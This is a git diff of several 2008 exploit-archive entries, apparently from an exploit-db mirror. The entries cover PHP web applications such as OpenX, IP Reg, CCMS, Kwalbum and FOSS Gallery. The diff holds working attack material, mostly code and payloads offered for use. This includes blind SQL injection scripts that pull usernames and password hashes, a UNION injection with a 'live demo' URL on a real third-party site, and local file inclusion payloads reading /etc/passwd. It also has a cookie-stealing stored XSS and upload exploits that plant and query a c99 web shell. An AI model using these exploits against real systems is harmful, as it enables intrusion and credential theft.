+DUSecurity Team / DarkCode + + +Exploit > + +http://olib.site.com/cgi/?session=[session_key]&infile=[LFI] + +files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini + + +Info - You need to login to get a valid session key. + + +------------------ +Extraz : + +Moodle Permanent XSS + +In Moodle blogging system, simply make a new blog entry with the title + + + +Now everyone that visits the bloggins system with execute your XSS. +Go get some cookies =D + +Enjoy! + +------------------ + + +Shouts :- +DUSecurity.com +DarkCode.me +Milw0rm.com +iWannaHack +WL-Group + +# milw0rm.com [2008-10-02] diff --git a/platforms/php/webapps/6655.php b/platforms/php/webapps/6655.php index 4f7f44345..3c6806749 100755 --- a/platforms/php/webapps/6655.php +++ b/platforms/php/webapps/6655.php @@ -1,53 +1,53 @@ - -OpenX Remote Blind SQL Injection Exploit By d00m3r4ng -
    -",0)) $i++; -return $i; -} -function getValue($length){ -for ($a=1;$a<$length;$a++){ -$bl=45; $bh=123; -while(!sockr($a,"=",$b=intval(($bl+$bh)/2))) -if (sockr($a,">",$b)) $bl=$b; -else $bh=$b; -$v.=chr($b);} -return $v; } -$host="127.0.0.1"; -$result="concat(username,0x3A,password)"; -$table="ox_users"; -if(isset($_POST['host'])){ -extract($_POST); -$l=0; -while(sockr(1,">",0)) $l++; -$f=$l; -for ($l=0;$l<$f;$l++) -if ($length=getLength()) echo "VALUE: ".getValue($length)."
    "; } -?> -OpenX Remote Blind SQL Injection Exploit By d00m3r4ng
    -Vuln discovered and Exploit coded by d00m3r4ng
    Contact: d00m3r4ng[at]gmail.com
    -

    -
    -Host:
    -OpenX Path: /
    -SELECT FROM
    - -
    - -# milw0rm.com [2008-10-02] + +OpenX Remote Blind SQL Injection Exploit By d00m3r4ng +
    +",0)) $i++; +return $i; +} +function getValue($length){ +for ($a=1;$a<$length;$a++){ +$bl=45; $bh=123; +while(!sockr($a,"=",$b=intval(($bl+$bh)/2))) +if (sockr($a,">",$b)) $bl=$b; +else $bh=$b; +$v.=chr($b);} +return $v; } +$host="127.0.0.1"; +$result="concat(username,0x3A,password)"; +$table="ox_users"; +if(isset($_POST['host'])){ +extract($_POST); +$l=0; +while(sockr(1,">",0)) $l++; +$f=$l; +for ($l=0;$l<$f;$l++) +if ($length=getLength()) echo "VALUE: ".getValue($length)."
    "; } +?> +OpenX Remote Blind SQL Injection Exploit By d00m3r4ng
    +Vuln discovered and Exploit coded by d00m3r4ng
    Contact: d00m3r4ng[at]gmail.com
    +

    +
    +Host:
    +OpenX Path: /
    +SELECT FROM
    + +
    + +# milw0rm.com [2008-10-02] diff --git a/platforms/php/webapps/6657.pl b/platforms/php/webapps/6657.pl index 460a76e13..4980b916a 100755 --- a/platforms/php/webapps/6657.pl +++ b/platforms/php/webapps/6657.pl 
@@ -1,91 +1,91 @@ -#!/usr/bin/perl -# ----------------------------------------------- -# IP Reg <= 0.4 Blind SQL Injection Exploit -# Discovered By StAkeR - StAkeR[at]hotmail[dot]it -# Discovered On 03/10/2008 -# ----------------------------------------------- -# Download http://sourceforge.net/projects/ipreg/ -# ----------------------------------------------- - -use strict; -use LWP::UserAgent; - -my @chars = (48..57, 97..102); -my $start = undef; -my $stop = undef; -my $hash = undef; -my $substr = 1; -my $http = new LWP::UserAgent; -my ($domain,$userid) = @ARGV; - -usage() unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; - - -sub send_request -{ - my $post = undef; - my $host = $domain; - my $param = shift @_ or die $!; - - $host .= "/login.php"; - $post = $http->post($host,[ - user_name => $param, - user_pass => 'admin' - ]); - -} - - -sub give_char -{ - my $send = undef; - my ($charz,$uidz) = @_; - - $send = "' or (select if((ascii(substring". - "(user_pass,$uidz,1))=$charz),". - "benchmark(200000000,char(0)),". - "0) from user where user_id=$userid)#"; - - return $send; -} - - -for(0..32) -{ - foreach my $set(@chars) - { - my $start = time(); - - send_request(give_char($set,$substr)); - - my $stop = time(); - - if($stop - $start > 3) - { - $hash .= chr($set); - $substr++ and last; - } - } -} - -sub usage -{ - print "[?] IP Reg <= 0.4 (login.php) Blind SQL Injection Exploit\n"; - print "[?] Exploit Coded By StAkeR - Benchmark Method\n"; - print "[?] Usage: perl $0 http://[host] [id]\n"; - exit; -} - - -if(defined $hash and $http->get($domain)->is_success) -{ - print "[?] Hash: $hash\n"; - exit; -} -else -{ - print "[?] 
Exploit Failed!\n"; - exit; -} - -# milw0rm.com [2008-10-03] +#!/usr/bin/perl +# ----------------------------------------------- +# IP Reg <= 0.4 Blind SQL Injection Exploit +# Discovered By StAkeR - StAkeR[at]hotmail[dot]it +# Discovered On 03/10/2008 +# ----------------------------------------------- +# Download http://sourceforge.net/projects/ipreg/ +# ----------------------------------------------- + +use strict; +use LWP::UserAgent; + +my @chars = (48..57, 97..102); +my $start = undef; +my $stop = undef; +my $hash = undef; +my $substr = 1; +my $http = new LWP::UserAgent; +my ($domain,$userid) = @ARGV; + +usage() unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; + + +sub send_request +{ + my $post = undef; + my $host = $domain; + my $param = shift @_ or die $!; + + $host .= "/login.php"; + $post = $http->post($host,[ + user_name => $param, + user_pass => 'admin' + ]); + +} + + +sub give_char +{ + my $send = undef; + my ($charz,$uidz) = @_; + + $send = "' or (select if((ascii(substring". + "(user_pass,$uidz,1))=$charz),". + "benchmark(200000000,char(0)),". + "0) from user where user_id=$userid)#"; + + return $send; +} + + +for(0..32) +{ + foreach my $set(@chars) + { + my $start = time(); + + send_request(give_char($set,$substr)); + + my $stop = time(); + + if($stop - $start > 3) + { + $hash .= chr($set); + $substr++ and last; + } + } +} + +sub usage +{ + print "[?] IP Reg <= 0.4 (login.php) Blind SQL Injection Exploit\n"; + print "[?] Exploit Coded By StAkeR - Benchmark Method\n"; + print "[?] Usage: perl $0 http://[host] [id]\n"; + exit; +} + + +if(defined $hash and $http->get($domain)->is_success) +{ + print "[?] Hash: $hash\n"; + exit; +} +else +{ + print "[?] Exploit Failed!\n"; + exit; +} + +# milw0rm.com [2008-10-03] diff --git a/platforms/php/webapps/6659.txt b/platforms/php/webapps/6659.txt index 2b98aa4a6..d08255342 100755 --- a/platforms/php/webapps/6659.txt +++ b/platforms/php/webapps/6659.txt 
@@ -1,55 +1,55 @@ -|___________________________________________________| -| -| Full PHP Emlak Script (arsaprint.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|-------------------- Hussin X -------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -| -|___________________________________________________ -| | -| -| script : http://php.arsivimiz.com/Kategoriler/PHP/alisveris -| -| DorK : :) -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77-- - - - - -L!VE DEMO: -_________ - - -http://www.ozsarigrup.com/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77-- - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaG I - -# milw0rm.com [2008-10-03] +|___________________________________________________| +| +| Full PHP Emlak Script (arsaprint.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|-------------------- Hussin X -------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: 
darkangel_g85[at]Yahoo[DoT]com +| +| +| +|___________________________________________________ +| | +| +| script : http://php.arsivimiz.com/Kategoriler/PHP/alisveris +| +| DorK : :) +|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77-- + + + + +L!VE DEMO: +_________ + + +http://www.ozsarigrup.com/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77-- + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab +|_____________________________________________________________________ + + + Im IRAQi | Im TrYaG I + +# milw0rm.com [2008-10-03] diff --git a/platforms/php/webapps/6663.txt b/platforms/php/webapps/6663.txt index e7ea2b97e..dc2a281b1 100755 --- a/platforms/php/webapps/6663.txt +++ b/platforms/php/webapps/6663.txt 
@@ -1,80 +1,80 @@ -############################################################################################ -[+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities -[+] Discovered By SirGod -[+] wWw.MorTal-TeaM.OrG -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke -############################################################################################ - -[+] Download Script : - - http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar - -[+] Local File Inclusion - --------------------------------------------------------------------------------------------- - - PoC 1 : - - http://[target]/[path]/index.php?skin=[Local File]%00 - - Example 1 : - - http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00 - - --------------------------------------------------------------------------------------------- - - PoC 2 : - - http://[target]/[path]/forums.php?skin=[Local File]%00 - - Example 2 : - - http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00 - - --------------------------------------------------------------------------------------------- - - PoC 3 : - - http://[target]/[path]/admin.php?skin=[Local File]%00 - - Example 3 : - - http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00 - --------------------------------------------------------------------------------------------- - - PoC 4 : - - http://[target]/[path]/header.php?skin=[Local File]%00 - - Example 4 : - - http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00 - --------------------------------------------------------------------------------------------- - - PoC 5 : - - http://[target]/[path]/pages/story.php?skin=[Local File]%00 - - Example 5 : - - http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00 - --------------------------------------------------------------------------------------------- - - PoC 6 : - - http://[target]/[path]/pages/poll.php?skin=[Local File]%00 - - Example 
6 : - - http://127.0.0.1/path/pages/poll.php?skin=../../../../../autoexec.bat%00 - --------------------------------------------------------------------------------------------- - -############################################################################################ - -# milw0rm.com [2008-10-03] +############################################################################################ +[+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities +[+] Discovered By SirGod +[+] wWw.MorTal-TeaM.OrG +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke +############################################################################################ + +[+] Download Script : + + http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar + +[+] Local File Inclusion + +-------------------------------------------------------------------------------------------- + + PoC 1 : + + http://[target]/[path]/index.php?skin=[Local File]%00 + + Example 1 : + + http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00 + + +-------------------------------------------------------------------------------------------- + + PoC 2 : + + http://[target]/[path]/forums.php?skin=[Local File]%00 + + Example 2 : + + http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00 + + +-------------------------------------------------------------------------------------------- + + PoC 3 : + + http://[target]/[path]/admin.php?skin=[Local File]%00 + + Example 3 : + + http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00 + +-------------------------------------------------------------------------------------------- + + PoC 4 : + + http://[target]/[path]/header.php?skin=[Local File]%00 + + Example 4 : + + http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00 + +-------------------------------------------------------------------------------------------- + + PoC 5 : + + http://[target]/[path]/pages/story.php?skin=[Local 
File]%00 + + Example 5 : + + http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00 + +-------------------------------------------------------------------------------------------- + + PoC 6 : + + http://[target]/[path]/pages/poll.php?skin=[Local File]%00 + + Example 6 : + + http://127.0.0.1/path/pages/poll.php?skin=../../../../../autoexec.bat%00 + +-------------------------------------------------------------------------------------------- + +############################################################################################ + +# milw0rm.com [2008-10-03] diff --git a/platforms/php/webapps/6664.txt b/platforms/php/webapps/6664.txt index 80aa3ac1c..530ed1e15 100755 --- a/platforms/php/webapps/6664.txt +++ b/platforms/php/webapps/6664.txt 
@@ -1,47 +1,47 @@ -========================================================== - Kwalbum <= 2.0.2 Arbitrary file upload Vulnerabilities -========================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 3 October 2008 -SITE : cwh.citec.us - -################################################################## -APPLICATION : Kwalbum -VERSION : <= 2.0.2 -DOWNLOAD : http://downloads.sourceforge.net/kwalbum/kwalbum-2.0.2.zip -################################################################## - ------------------ -Description: ------------------ -After registeration, you may obtain view, upload or admin permission. -If you obtain an upload permission, you can upload php files which can access as a below example url. - ------------ -Exploit: ------------ -[+] upload page: http://[target]/[path to kwalbum]/?p=UploadItems -[+] exploit file format: http://[target]/[path to kwalbum]/[path to store image]/[year]/[month]/shell.php -[+] exploit file example: http://[target]/[path to kwalbum]/items/08/10/shell.php - - -##################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2008-10-03] +========================================================== + Kwalbum <= 2.0.2 Arbitrary file upload Vulnerabilities +========================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 3 October 2008 +SITE : cwh.citec.us + +################################################################## +APPLICATION : Kwalbum +VERSION : <= 2.0.2 +DOWNLOAD : http://downloads.sourceforge.net/kwalbum/kwalbum-2.0.2.zip +################################################################## + +----------------- +Description: +----------------- +After registeration, you may obtain view, upload or admin permission. +If you obtain an upload permission, you can upload php files which can access as a below example url. + +----------- +Exploit: +----------- +[+] upload page: http://[target]/[path to kwalbum]/?p=UploadItems +[+] exploit file format: http://[target]/[path to kwalbum]/[path to store image]/[year]/[month]/shell.php +[+] exploit file example: http://[target]/[path to kwalbum]/items/08/10/shell.php + + +##################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2008-10-03] diff --git a/platforms/php/webapps/6667.txt b/platforms/php/webapps/6667.txt index 9dc8ea8c7..b39254ca9 100755 --- a/platforms/php/webapps/6667.txt +++ b/platforms/php/webapps/6667.txt 
@@ -1,65 +1,65 @@ -# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability -# url: http://www.phlatline.org/docs/files/ppim.zip -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - - -description of vulnerability: ------------------------------------------------ -the variable 'id' has been not defined in code -and the variable 'id' is sent by the users. ------------------------------------------------ - -vuln file: notes.php - -vuln code: -x: >... -107: if (isset($_GET["mode"])) - - { - - if ($_GET["mode"]=="edit") - - { - - if (isset($_GET['id'])) - - { - - $notefile = $_GET['id']; - - if ($notefile == "new") - - { - - $title = ""; - - $notes = ""; - - } - - else - - { - - $temp = "notes/" . $notefile; - - require($temp); - -123: } -x: <... -x: }}} - -exploit: GET /notes.php?mode=edit&id=[file] -sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd - -live demo: -http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php - -# milw0rm.com [2008-10-04] +# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability +# url: http://www.phlatline.org/docs/files/ppim.zip +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + + +description of vulnerability: +----------------------------------------------- +the variable 'id' has been not defined in code +and the variable 'id' is sent by the users. +----------------------------------------------- + +vuln file: notes.php + +vuln code: +x: >... 
+107: if (isset($_GET["mode"])) + + { + + if ($_GET["mode"]=="edit") + + { + + if (isset($_GET['id'])) + + { + + $notefile = $_GET['id']; + + if ($notefile == "new") + + { + + $title = ""; + + $notes = ""; + + } + + else + + { + + $temp = "notes/" . $notefile; + + require($temp); + +123: } +x: <... +x: }}} + +exploit: GET /notes.php?mode=edit&id=[file] +sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd + +live demo: +http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php + +# milw0rm.com [2008-10-04] diff --git a/platforms/php/webapps/6669.txt b/platforms/php/webapps/6669.txt index 142ec39e1..9d8f9cb6a 100755 --- a/platforms/php/webapps/6669.txt +++ b/platforms/php/webapps/6669.txt 
@@ -1,34 +1,34 @@ -################################################################################################# -[+] JMweb MP3 (src) Multiple Local File Inclusion -[+] Discovered By SirGod -[+] wWw.MorTal-TeaM.OrG -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex -################################################################################################## - -# Script Homepage: -# http://www.jesse-web.co.cc // - -[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip - -[+] Local File Inclusion - - Example 1 : - - http://[target]/[path]/listen.php?src=[Local File]%00 - - PoC 1 : - - http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00 - - - Example 2 : - - http://[target]/[path]/download.php?src=[Local File]%00 - - PoC 2 : - - http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00 - -################################################################################################## - -# milw0rm.com [2008-10-04] +################################################################################################# +[+] JMweb MP3 (src) Multiple Local File Inclusion +[+] Discovered By SirGod +[+] wWw.MorTal-TeaM.OrG +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex +################################################################################################## + +# Script Homepage: +# http://www.jesse-web.co.cc // + +[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip + +[+] Local File Inclusion + + Example 1 : + + http://[target]/[path]/listen.php?src=[Local File]%00 + + PoC 1 : + + http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00 + + + Example 2 : + + http://[target]/[path]/download.php?src=[Local File]%00 + + PoC 2 : + + http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00 + 
+################################################################################################## + +# milw0rm.com [2008-10-04] diff --git a/platforms/php/webapps/6670.txt b/platforms/php/webapps/6670.txt index 1e087666b..53c401bab 100755 --- a/platforms/php/webapps/6670.txt +++ b/platforms/php/webapps/6670.txt 
@@ -1,78 +1,78 @@ -#! /usr/bin/perl - -# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# FOSS Gallery Admin Version <= 1.0 / Remote Arbitrary Upload Vulnerability -# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# Program: FOSS Gallery Admin Version -# Version: <= 1.0 -# File affected: processFiles.php -# Download: http://sourceforge.net/projects/fossgallery/ -# -# -# Found by Pepelux -# eNYe-Sec - www.enye-sec.org -# -# Upload images is only allowed to the admin but the process to upload has -# 3 steps (with 3 pages). only the first page check the user permissions. -# -# STEPS: -# uploadForm1.php -> ask for the number of files you wish to upload -# uploadForm2.php -> ask for the files to upload -# processFiles.php -> process the file(s) -# -# Also image format is not validated and you can upload any file. -# -# You can POST directly in the 3th step (processFiles.php): -# - uploadNeed = 1 ... we only need to upload 1 file -# - uploadFile0 = shell.php ... the file to upload - - - -use LWP::UserAgent; -use HTTP::Request::Common; -use HTTP::Headers; - -my ($host, $file) = @ARGV ; - - - -unless($ARGV[1]){ - - print "\nUsage: perl $0 \n"; - - print "\tex: perl $0 http://localhost shell.php\n\n"; - - exit 1; - -} - - -$host = 'http://'.$host if ($host !~ /^http:/); - -$host .= "/" if ($host !~ /\/\$/); - - -my $ua = LWP::UserAgent->new(); -$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); - -$ua->timeout(10); - -my $request = HTTP::Request->new(); -my $response; -my $header; -my $url = $host."processFiles.php"; - -$response = $ua->request(POST $url, Content_Type => 'form-data', - Content => [ uploadNeed => "1", uploadFile0 => [$file]]); - -$content = $response->content; - - - -if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully. 
File located in:\n".$host.$file."\n"; } -else { print "\nExploit failed\n"; } - - -exit; - -# milw0rm.com [2008-10-04] +#! /usr/bin/perl + +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +# FOSS Gallery Admin Version <= 1.0 / Remote Arbitrary Upload Vulnerability +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +# Program: FOSS Gallery Admin Version +# Version: <= 1.0 +# File affected: processFiles.php +# Download: http://sourceforge.net/projects/fossgallery/ +# +# +# Found by Pepelux +# eNYe-Sec - www.enye-sec.org +# +# Upload images is only allowed to the admin but the process to upload has +# 3 steps (with 3 pages). only the first page check the user permissions. +# +# STEPS: +# uploadForm1.php -> ask for the number of files you wish to upload +# uploadForm2.php -> ask for the files to upload +# processFiles.php -> process the file(s) +# +# Also image format is not validated and you can upload any file. +# +# You can POST directly in the 3th step (processFiles.php): +# - uploadNeed = 1 ... we only need to upload 1 file +# - uploadFile0 = shell.php ... the file to upload + + + +use LWP::UserAgent; +use HTTP::Request::Common; +use HTTP::Headers; + +my ($host, $file) = @ARGV ; + + + +unless($ARGV[1]){ + + print "\nUsage: perl $0 \n"; + + print "\tex: perl $0 http://localhost shell.php\n\n"; + + exit 1; + +} + + +$host = 'http://'.$host if ($host !~ /^http:/); + +$host .= "/" if ($host !~ /\/\$/); + + +my $ua = LWP::UserAgent->new(); +$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); + +$ua->timeout(10); + +my $request = HTTP::Request->new(); +my $response; +my $header; +my $url = $host."processFiles.php"; + +$response = $ua->request(POST $url, Content_Type => 'form-data', + Content => [ uploadNeed => "1", uploadFile0 => [$file]]); + +$content = $response->content; + + + +if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully. 
File located in:\n".$host.$file."\n"; } +else { print "\nExploit failed\n"; } + + +exit; + +# milw0rm.com [2008-10-04] diff --git a/platforms/php/webapps/6674.pl b/platforms/php/webapps/6674.pl index 0d110325d..56853fb67 100755 --- a/platforms/php/webapps/6674.pl +++ b/platforms/php/webapps/6674.pl 
@@ -1,130 +1,130 @@ -# FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit -# url: http://downloads.sourceforge.net/fossgallery/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# OUTPUT: -# -# Exploited sucessfully. -# -# [+] Info: -# Linux h4x0rz 2.6.18-6-686 #1 SMP Mon Aug 18 08:42:39 UTC 2008 i686 -# uid=33(www-data) gid=33(www-data) groups=33(www-data) -# Safe Mode: OFF (not secure) -# -# joss@h4x0rz:~/Desktop$ - - -use LWP::UserAgent; -use HTTP::Request::Common; -use HTTP::Headers; -use LWP::UserAgent; -use HTTP::Request; -use LWP::Simple; - -sub lw -{ - -my $SO = $^O; -my $linux = ""; -if (index(lc($SO),"win")!=-1){ - $linux="0"; - }else{ - $linux="1"; - } - if($linux){ -system("clear"); -} -else{ -system("cls"); -} -} - -my ($host, $file) = @ARGV ; - -if (!$ARGV[0]) { - -&lw; -print "\n[x] FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit\n"; -print "[x] written by JosS - sys-project[at]hotmail.com\n"; -print "[x] http://www.spanish-hackers.com/\n\n"; -print "Usage: $0 [host] [file] \n"; -print "if doesn't exist the file: file default is phpshell C99\n\n"; -exit; -} -if (!$ARGV[1]) -{ -$file="c99.php"; -} - -&lw; - -$host = 'http://'.$host if ($host !~ /^http:/); -$host .= "/" if ($host !~ /\/\$/); - -my $ua = LWP::UserAgent->new(); -$ua->timeout(12); -my $request = HTTP::Request->new(); -my $response; -my $header; -my $url = $host."processFiles.php"; - -$response = $ua->request(POST $url, Content_Type => 'form-data', - Content => [ uploadNeed => "1", uploadFile0 => [$file]]); -$content = $response->content; - -if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully.\n"; } -else { print "\nExploit failed\n"; exit;} - -my $c99="c99.php"; -chomp ($c99); - -if ($file =~ /c99.php/) -{ - 
-$comando="?act=cmd&d=/&cmd=/&cmd_txt=1&submit=Execute"; - -print "\n"; - - -my $final = $host.$c99.$comando; - -my $ua = LWP::UserAgent->new; - -my $req = HTTP::Request->new(GET => $final); - -$ua->timeout(10); - -$doc = $ua->request($req)->as_string; - - - -$kernel = $1 if ( $doc =~ m/-a:  (.*?)\<\/b>/mosix); -$id = $1 if ( $doc =~ m/uid (.*?)\<\/b>/mosix); - -$safe = $1 if ( $doc =~ m/color=green> (.*?)\<\/font>/mosix); - - - -print "[+] Info:\n"; - -print " $kernel\n"; -print " uid$id\n"; - -print " Safe Mode: $safe\n"; - -print "\n"; - - - -} - -__EOF__ - -# milw0rm.com [2008-10-05] +# FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit +# url: http://downloads.sourceforge.net/fossgallery/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# OUTPUT: +# +# Exploited sucessfully. 
+# +# [+] Info: +# Linux h4x0rz 2.6.18-6-686 #1 SMP Mon Aug 18 08:42:39 UTC 2008 i686 +# uid=33(www-data) gid=33(www-data) groups=33(www-data) +# Safe Mode: OFF (not secure) +# +# joss@h4x0rz:~/Desktop$ + + +use LWP::UserAgent; +use HTTP::Request::Common; +use HTTP::Headers; +use LWP::UserAgent; +use HTTP::Request; +use LWP::Simple; + +sub lw +{ + +my $SO = $^O; +my $linux = ""; +if (index(lc($SO),"win")!=-1){ + $linux="0"; + }else{ + $linux="1"; + } + if($linux){ +system("clear"); +} +else{ +system("cls"); +} +} + +my ($host, $file) = @ARGV ; + +if (!$ARGV[0]) { + +&lw; +print "\n[x] FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit\n"; +print "[x] written by JosS - sys-project[at]hotmail.com\n"; +print "[x] http://www.spanish-hackers.com/\n\n"; +print "Usage: $0 [host] [file] \n"; +print "if doesn't exist the file: file default is phpshell C99\n\n"; +exit; +} +if (!$ARGV[1]) +{ +$file="c99.php"; +} + +&lw; + +$host = 'http://'.$host if ($host !~ /^http:/); +$host .= "/" if ($host !~ /\/\$/); + +my $ua = LWP::UserAgent->new(); +$ua->timeout(12); +my $request = HTTP::Request->new(); +my $response; +my $header; +my $url = $host."processFiles.php"; + +$response = $ua->request(POST $url, Content_Type => 'form-data', + Content => [ uploadNeed => "1", uploadFile0 => [$file]]); +$content = $response->content; + +if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully.\n"; } +else { print "\nExploit failed\n"; exit;} + +my $c99="c99.php"; +chomp ($c99); + +if ($file =~ /c99.php/) +{ + +$comando="?act=cmd&d=/&cmd=/&cmd_txt=1&submit=Execute"; + +print "\n"; + + +my $final = $host.$c99.$comando; + +my $ua = LWP::UserAgent->new; + +my $req = HTTP::Request->new(GET => $final); + +$ua->timeout(10); + +$doc = $ua->request($req)->as_string; + + + +$kernel = $1 if ( $doc =~ m/-a:  (.*?)\<\/b>/mosix); +$id = $1 if ( $doc =~ m/uid (.*?)\<\/b>/mosix); + +$safe = $1 if ( $doc =~ 